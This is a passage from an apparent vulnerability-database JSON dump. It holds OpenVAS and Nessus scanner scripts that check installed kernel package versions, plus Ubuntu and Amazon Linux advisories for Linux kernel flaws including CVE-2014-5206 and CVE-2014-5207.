\"CVE-2014-4699\", \"CVE-2014-0206\", \"CVE-2014-4508\", \"CVE-2014-4014\",\n \"CVE-2014-3153\", \"CVE-2014-3940\", \"CVE-2014-3917\", \"CVE-2014-3144\",\n \"CVE-2014-3145\", \"CVE-2014-1738\", \"CVE-2014-1737\", \"CVE-2014-0181\",\n \"CVE-2014-0196\", \"CVE-2014-3122\", \"CVE-2014-2851\", \"CVE-2014-0155\",\n \"CVE-2014-2678\", \"CVE-2014-2580\", \"CVE-2014-0077\", \"CVE-2014-0055\",\n \"CVE-2014-2568\", \"CVE-2014-0131\", \"CVE-2014-2523\", \"CVE-2014-2309\",\n 
\"CVE-2014-0100\", \"CVE-2014-0101\", \"CVE-2014-0049\", \"CVE-2014-0102\",\n \"CVE-2014-2039\", \"CVE-2014-0069\", \"CVE-2014-1874\", \"CVE-2014-1446\",\n \"CVE-2014-1438\", \"CVE-2013-4579\", \"CVE-2013-4587\", \"CVE-2013-6376\",\n \"CVE-2013-6368\", \"CVE-2013-6367\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Update for kernel FEDORA-2014-9466\");\n script_tag(name:\"affected\", value:\"kernel on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-9466\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-August/136831.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~3.15.10~200.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:30", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3122", "CVE-2014-5077", "CVE-2013-2234", "CVE-2014-3940", "CVE-2013-4345", "CVE-2014-0155", "CVE-2013-2894", 
"CVE-2014-0131", "CVE-2013-2896", "CVE-2014-0100", "CVE-2014-1737", "CVE-2013-6378", "CVE-2014-4699", "CVE-2014-1874", "CVE-2013-2891", "CVE-2013-4254", "CVE-2013-2892", "CVE-2014-4508", "CVE-2014-1738", "CVE-2014-2568", "CVE-2014-4943", "CVE-2014-0206", "CVE-2013-1059", "CVE-2014-3145", "CVE-2014-4171", "CVE-2014-1446", "CVE-2014-5206", "CVE-2014-4014", "CVE-2013-2897", "CVE-2013-6368", "CVE-2014-3917", "CVE-2013-2232", "CVE-2014-2851", "CVE-2014-3534", "CVE-2014-2309", "CVE-2014-2678", "CVE-2013-6382", "CVE-2014-2039", "CVE-2014-5045", "CVE-2014-4715", "CVE-2013-4563", "CVE-2013-4579", "CVE-2014-3144", "CVE-2014-0102", "CVE-2013-6405", "CVE-2013-2899", "CVE-2014-3153", "CVE-2014-2580", "CVE-2013-4125", "CVE-2013-6367", "CVE-2014-0049", "CVE-2013-4387", "CVE-2013-6376", "CVE-2014-0055", "CVE-2013-4350", "CVE-2013-6380", "CVE-2013-0343", "CVE-2014-5207", "CVE-2014-1438", "CVE-2014-0077", "CVE-2013-4587", "CVE-2013-2895", "CVE-2013-4348", "CVE-2013-4470", "CVE-2013-4343", "CVE-2014-2523", "CVE-2013-2888", "CVE-2014-0101", "CVE-2014-0069", "CVE-2013-2889", "CVE-2013-2893"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2014-08-20T00:00:00", "id": "OPENVAS:1361412562310868102", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868102", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2014-9449", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2014-9449\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but 
WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868102\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-08-20 05:52:44 +0200 (Wed, 20 Aug 2014)\");\n script_cve_id(\"CVE-2014-5206\", \"CVE-2014-5207\", \"CVE-2014-5077\", \"CVE-2014-4171\",\n \"CVE-2014-5045\", \"CVE-2014-3534\", \"CVE-2014-4943\", \"CVE-2014-4715\",\n \"CVE-2014-4699\", \"CVE-2014-0206\", \"CVE-2014-4508\", \"CVE-2014-4014\",\n \"CVE-2014-3153\", \"CVE-2014-3940\", \"CVE-2014-3917\", \"CVE-2014-3144\",\n \"CVE-2014-3145\", \"CVE-2014-1738\", \"CVE-2014-1737\", \"CVE-2014-3122\",\n \"CVE-2014-2851\", \"CVE-2014-0155\", \"CVE-2014-2678\", \"CVE-2014-2580\",\n \"CVE-2014-0077\", \"CVE-2014-0055\", \"CVE-2014-2568\", \"CVE-2014-0131\",\n \"CVE-2014-2523\", \"CVE-2014-2309\", \"CVE-2014-0100\", \"CVE-2014-0101\",\n \"CVE-2014-0049\", \"CVE-2014-0102\", \"CVE-2014-2039\", \"CVE-2014-0069\",\n \"CVE-2014-1874\", \"CVE-2014-1446\", \"CVE-2014-1438\", \"CVE-2013-4579\",\n \"CVE-2013-4587\", \"CVE-2013-6376\", \"CVE-2013-6368\", \"CVE-2013-6367\",\n \"CVE-2013-6405\", \"CVE-2013-6382\", \"CVE-2013-6380\", \"CVE-2013-6378\",\n \"CVE-2013-4563\", \"CVE-2013-4348\", \"CVE-2013-4470\", \"CVE-2013-4387\",\n \"CVE-2013-4345\", \"CVE-2013-4350\", \"CVE-2013-4343\", \"CVE-2013-2888\",\n \"CVE-2013-2889\", \"CVE-2013-2891\", \"CVE-2013-2892\", \"CVE-2013-2893\",\n \"CVE-2013-2894\", 
\"CVE-2013-2895\", \"CVE-2013-2896\", \"CVE-2013-2897\",\n \"CVE-2013-2899\", \"CVE-2013-0343\", \"CVE-2013-4254\", \"CVE-2013-4125\",\n \"CVE-2013-2232\", \"CVE-2013-1059\", \"CVE-2013-2234\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Update for kernel FEDORA-2014-9449\");\n script_tag(name:\"affected\", value:\"kernel on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-9449\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-August/136869.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~3.14.17~100.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-17T15:49:19", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-19527", "CVE-2020-11494", "CVE-2019-5108", "CVE-2019-19054", "CVE-2020-8992", "CVE-2020-8648", "CVE-2020-12770", "CVE-2020-9383", "CVE-2017-8068", "CVE-2019-19533", "CVE-2017-13080", 
"CVE-2019-19534", "CVE-2019-19057", "CVE-2014-3180", "CVE-2019-19332", "CVE-2019-14901", "CVE-2017-13693", "CVE-2020-12826", "CVE-2014-4508", "CVE-2019-19524", "CVE-2020-10942", "CVE-2019-14896", "CVE-2019-19062", "CVE-2018-13093", "CVE-2019-19922", "CVE-2020-11609", "CVE-2020-10720", "CVE-2019-20636", "CVE-2019-19523", "CVE-2019-19768", "CVE-2020-12464", "CVE-2014-5206", "CVE-2019-19965", "CVE-2020-12654", "CVE-2018-9389", "CVE-2019-19227", "CVE-2019-19319", "CVE-2019-19531", "CVE-2016-3951", "CVE-2019-10220", "CVE-2019-19063", "CVE-2018-1000204", "CVE-2018-9383", "CVE-2019-14895", "CVE-2019-14897", "CVE-2019-19066", "CVE-2020-12653", "CVE-2019-19528", "CVE-2014-4608", "CVE-2020-11608", "CVE-2020-11668", "CVE-2016-9756", "CVE-2019-16230", "CVE-2020-13143", "CVE-2019-9458", "CVE-2017-12153", "CVE-2020-11565", "CVE-2020-8649", "CVE-2019-14898", "CVE-2020-12652", "CVE-2019-2215", "CVE-2019-19073", "CVE-2014-5207", "CVE-2020-8647", "CVE-2019-19530", "CVE-2019-19532", "CVE-2019-19074", "CVE-2019-18675", "CVE-2019-19537", "CVE-2020-2732", "CVE-2019-19966", "CVE-2019-19060", "CVE-2020-12655", "CVE-2019-19056", "CVE-2019-19536", "CVE-2019-20054", "CVE-2014-7970", "CVE-2019-20096"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-06-16T00:00:00", "published": "2020-06-16T00:00:00", "id": "OPENVAS:1361412562311220201674", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220201674", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2020-1674)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 
2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2020.1674\");\n script_version(\"2020-06-16T05:49:04+0000\");\n script_cve_id(\"CVE-2014-3180\", \"CVE-2014-4508\", \"CVE-2014-4608\", \"CVE-2014-5206\", \"CVE-2014-5207\", \"CVE-2014-7970\", \"CVE-2016-3951\", \"CVE-2016-9756\", \"CVE-2017-12153\", \"CVE-2017-13080\", \"CVE-2017-13693\", \"CVE-2017-8068\", \"CVE-2018-1000204\", \"CVE-2018-13093\", \"CVE-2018-9383\", \"CVE-2018-9389\", \"CVE-2019-10220\", \"CVE-2019-14895\", \"CVE-2019-14896\", \"CVE-2019-14897\", \"CVE-2019-14898\", \"CVE-2019-14901\", \"CVE-2019-16230\", \"CVE-2019-18675\", \"CVE-2019-19054\", \"CVE-2019-19056\", \"CVE-2019-19057\", \"CVE-2019-19060\", \"CVE-2019-19062\", \"CVE-2019-19063\", \"CVE-2019-19066\", \"CVE-2019-19073\", \"CVE-2019-19074\", \"CVE-2019-19227\", \"CVE-2019-19319\", \"CVE-2019-19332\", \"CVE-2019-19523\", \"CVE-2019-19524\", \"CVE-2019-19527\", \"CVE-2019-19528\", \"CVE-2019-19530\", \"CVE-2019-19531\", \"CVE-2019-19532\", \"CVE-2019-19533\", \"CVE-2019-19534\", \"CVE-2019-19536\", \"CVE-2019-19537\", \"CVE-2019-19768\", \"CVE-2019-19922\", \"CVE-2019-19965\", \"CVE-2019-19966\", \"CVE-2019-20054\", \"CVE-2019-20096\", \"CVE-2019-20636\", \"CVE-2019-2215\", \"CVE-2019-5108\", \"CVE-2019-9458\", \"CVE-2020-10720\", \"CVE-2020-10942\", \"CVE-2020-11494\", \"CVE-2020-11565\", \"CVE-2020-11608\", \"CVE-2020-11609\", \"CVE-2020-11668\", \"CVE-2020-12464\", \"CVE-2020-12652\", \"CVE-2020-12653\", 
\"CVE-2020-12654\", \"CVE-2020-12655\", \"CVE-2020-12770\", \"CVE-2020-12826\", \"CVE-2020-13143\", \"CVE-2020-2732\", \"CVE-2020-8647\", \"CVE-2020-8648\", \"CVE-2020-8649\", \"CVE-2020-8992\", \"CVE-2020-9383\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-16 05:49:04 +0000 (Tue, 16 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-06-16 05:49:04 +0000 (Tue, 16 Jun 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2020-1674)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP2\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2020-1674\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-1674\");\n script_xref(name:\"URL\", value:\"https://github.com/torvalds/linux/commit/a45b599ad808c3c982fdcdc12b0b8611c2f92824\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'kernel' package(s) announced via the EulerOS-SA-2020-1674 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"In the Linux kernel before 5.5.8, get_raw_socket in drivers/vhost/ net.c lacks validation of an sk_family field, which might allow attackers to trigger kernel stack corruption via crafted system calls.(CVE-2020-10942)\n\nIn the Linux kernel 5.0.21, a setxattr operation, after a mount of a crafted ext4 image, can cause a slab-out-of-bounds write access because of an 
ext4_xattr_set_entry use-after-free in fs/ext4/xattr.c when a large old_size value is used in a memset call.(CVE-2019-19319)\n\nIn kernel/compat.c in the Linux kernel before 3.17, as used in Google Chrome OS and other products, there is a possible out-of-bounds read. restart_syscall uses uninitialized data when restarting compat_sys_nanosleep. NOTE: this is disputed because the code path is unreachable.(CVE-2014-3180)\n\nIn the Linux kernel 5.4.0-rc2, there is a use-after-free (read) in the __blk_add_trace function in kernel/trace/blktrace.c (which is used to fill out a blk_io_trace structure and place it in a per-cpu sub-buffer).(CVE-2019-19768)\n\nThere is a use-after-free vulnerability in the Linux kernel through 5.5.2 in the vc_do_resize function in drivers/tty/vt/vt.c.(CVE-2020-8647)\n\nThere is a use-after-free vulnerability in the Linux kernel through 5.5.2 in the vgacon_invert_region function in drivers/video/console/vgacon.c.(CVE-2020-8649)\n\ndrivers/gpu/drm/radeon/radeon_display.c in the Linux kernel 5.2.14 does not check the alloc_workqueue return value, leading to a NULL pointer dereference. NOTE: A third-party software maintainer states that the work queue allocation is happening during device initialization, which for a graphics card occurs during boot. It is not attacker controllable and OOM at that time is highly unlikely.(CVE-2019-16230)\n\nThere is a use-after-free vulnerability in the Linux kernel through 5.5.2 in the n_tty_receive_buf_common function in drivers/tty/ n_tty.c.(CVE-2020-8648)\n\nA flaw was discovered in the way that the KVM hypervisor handled instruction emulation for an L2 guest when nested virtualisation is enabled. Under some circumstances, an L2 guest may trick the L0 guest into accessing sensitive L1 resources that should be inaccessible to the L2 guest.(CVE-2020-2732)\n\nAn issue was discovered in the Linux kernel through 5.5.6. 
set_fdc in drivers/block/floppy.c leads to a wait_til_ready out-of-bounds read because the FDC index is not checked for errors before assigning it, aka CID-2e90ca68b0d2.(CVE-2020-9383)\n\next4_protect_reserved_inode in fs/ext4/block_validity.c in the Linux kernel through 5.5.3 allows attackers to cause a denial of service (soft lockup) via a crafted journal size.(CVE-2020-8992)\n\nWi-Fi ...\n\n Description truncated. Please see the references for more information.\");\n\n script_tag(name:\"affected\", value:\"'kernel' package(s) on Huawei EulerOS V2.0SP2.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP2\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~3.10.0~327.62.59.83.h230\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~3.10.0~327.62.59.83.h230\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~3.10.0~327.62.59.83.h230\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~3.10.0~327.62.59.83.h230\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debuginfo-common-x86_64\", rpm:\"kernel-debuginfo-common-x86_64~3.10.0~327.62.59.83.h230\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.10.0~327.62.59.83.h230\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-headers\", 
rpm:\"kernel-headers~3.10.0~327.62.59.83.h230\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~3.10.0~327.62.59.83.h230\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-libs\", rpm:\"kernel-tools-libs~3.10.0~327.62.59.83.h230\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perf\", rpm:\"perf~3.10.0~327.62.59.83.h230\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~3.10.0~327.62.59.83.h230\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2020-07-02T11:34:04", "bulletinFamily": "unix", "cvelist": ["CVE-2014-5206", "CVE-2014-5207"], "description": "Eric W. Biederman discovered a flaw with the mediation of mount flags in \nthe Linux kernel's user namespace subsystem. An unprivileged user could \nexploit this flaw to by-pass mount restrictions, and potentially gain \nadministrative privileges. (CVE-2014-5207)\n\nKenton Varda discovered a flaw with read-only bind mounts when used with \nuser namespaces. An unprivileged local user could exploit this flaw to gain \nfull write privileges to a mount that should be read only. (CVE-2014-5206)", "edition": 5, "modified": "2014-08-18T00:00:00", "published": "2014-08-18T00:00:00", "id": "USN-2317-1", "href": "https://ubuntu.com/security/notices/USN-2317-1", "title": "Linux kernel (Trusty HWE) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:39:57", "bulletinFamily": "unix", "cvelist": ["CVE-2014-5206", "CVE-2014-5207"], "description": "Eric W. 
Biederman discovered a flaw with the mediation of mount flags in \nthe Linux kernel's user namespace subsystem. An unprivileged user could \nexploit this flaw to by-pass mount restrictions, and potentially gain \nadministrative privileges. (CVE-2014-5207)\n\nKenton Varda discovered a flaw with read-only bind mounts when used with \nuser namespaces. An unprivileged local user could exploit this flaw to gain \nfull write privileges to a mount that should be read only. (CVE-2014-5206)", "edition": 5, "modified": "2014-08-18T00:00:00", "published": "2014-08-18T00:00:00", "id": "USN-2318-1", "href": "https://ubuntu.com/security/notices/USN-2318-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "amazon": [{"lastseen": "2020-11-10T12:35:35", "bulletinFamily": "unix", "cvelist": ["CVE-2014-5206", "CVE-2014-5207"], "description": "**Issue Overview:**\n\nfs/namespace.c in the Linux kernel through 3.16.1 does not properly restrict clearing MNT_NODEV, MNT_NOSUID, and MNT_NOEXEC and changing MNT_ATIME_MASK during a remount of a bind mount, which allows local users to gain privileges, interfere with backups and auditing on systems that had atime enabled, or cause a denial of service (excessive filesystem updating) on systems that had atime disabled via a \"mount -o remount\" command within a user namespace. \n\nThe do_remount function in fs/namespace.c in the Linux kernel through 3.16.1 does not maintain the MNT_LOCK_READONLY bit across a remount of a bind mount, which allows local users to bypass an intended read-only restriction and defeat certain sandbox protection mechanisms via a \"mount -o remount\" command within a user namespace.\n\n \n**Affected Packages:** \n\n\nkernel\n\n \n**Issue Correction:** \nRun _yum update kernel_ to update your system. 
You will need to reboot your system in order for the new kernel to be running.\n\n \n\n\n**New Packages:**\n \n \n i686: \n kernel-tools-debuginfo-3.14.19-17.43.amzn1.i686 \n kernel-3.14.19-17.43.amzn1.i686 \n kernel-debuginfo-3.14.19-17.43.amzn1.i686 \n perf-3.14.19-17.43.amzn1.i686 \n kernel-tools-3.14.19-17.43.amzn1.i686 \n kernel-devel-3.14.19-17.43.amzn1.i686 \n kernel-tools-devel-3.14.19-17.43.amzn1.i686 \n perf-debuginfo-3.14.19-17.43.amzn1.i686 \n kernel-headers-3.14.19-17.43.amzn1.i686 \n kernel-debuginfo-common-i686-3.14.19-17.43.amzn1.i686 \n \n noarch: \n kernel-doc-3.14.19-17.43.amzn1.noarch \n \n src: \n kernel-3.14.19-17.43.amzn1.src \n \n x86_64: \n perf-debuginfo-3.14.19-17.43.amzn1.x86_64 \n kernel-devel-3.14.19-17.43.amzn1.x86_64 \n perf-3.14.19-17.43.amzn1.x86_64 \n kernel-3.14.19-17.43.amzn1.x86_64 \n kernel-debuginfo-3.14.19-17.43.amzn1.x86_64 \n kernel-tools-devel-3.14.19-17.43.amzn1.x86_64 \n kernel-debuginfo-common-x86_64-3.14.19-17.43.amzn1.x86_64 \n kernel-tools-3.14.19-17.43.amzn1.x86_64 \n kernel-tools-debuginfo-3.14.19-17.43.amzn1.x86_64 \n kernel-headers-3.14.19-17.43.amzn1.x86_64 \n \n \n", "edition": 4, "modified": "2014-09-18T21:04:00", "published": "2014-09-18T21:04:00", "id": "ALAS-2014-417", "href": "https://alas.aws.amazon.com/ALAS-2014-417.html", "title": "Medium: kernel", "type": "amazon", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-12T10:13:07", "description": "The 3.15.10 stable update contains a number of important fixes across\nthe tree. Fix CVE-2014-5206, CVE-2014-5207: ro bind mount bypass with\nnamespaces\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 14, "published": "2014-08-17T00:00:00", "title": "Fedora 20 : kernel-3.15.10-200.fc20 (2014-9466)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-5206", "CVE-2014-5207"], "modified": "2014-08-17T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:kernel", "cpe:/o:fedoraproject:fedora:20"], "id": "FEDORA_2014-9466.NASL", "href": "https://www.tenable.com/plugins/nessus/77233", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-9466.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77233);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-5206\", \"CVE-2014-5207\");\n script_bugtraq_id(69214, 69216);\n script_xref(name:\"FEDORA\", value:\"2014-9466\");\n\n script_name(english:\"Fedora 20 : kernel-3.15.10-200.fc20 (2014-9466)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The 3.15.10 stable update contains a number of important fixes across\nthe tree. Fix CVE-2014-5206, CVE-2014-5207: ro bind mount bypass with\nnamespaces\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1129662\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-August/136831.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e5d5b54d\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/08/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/08/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") 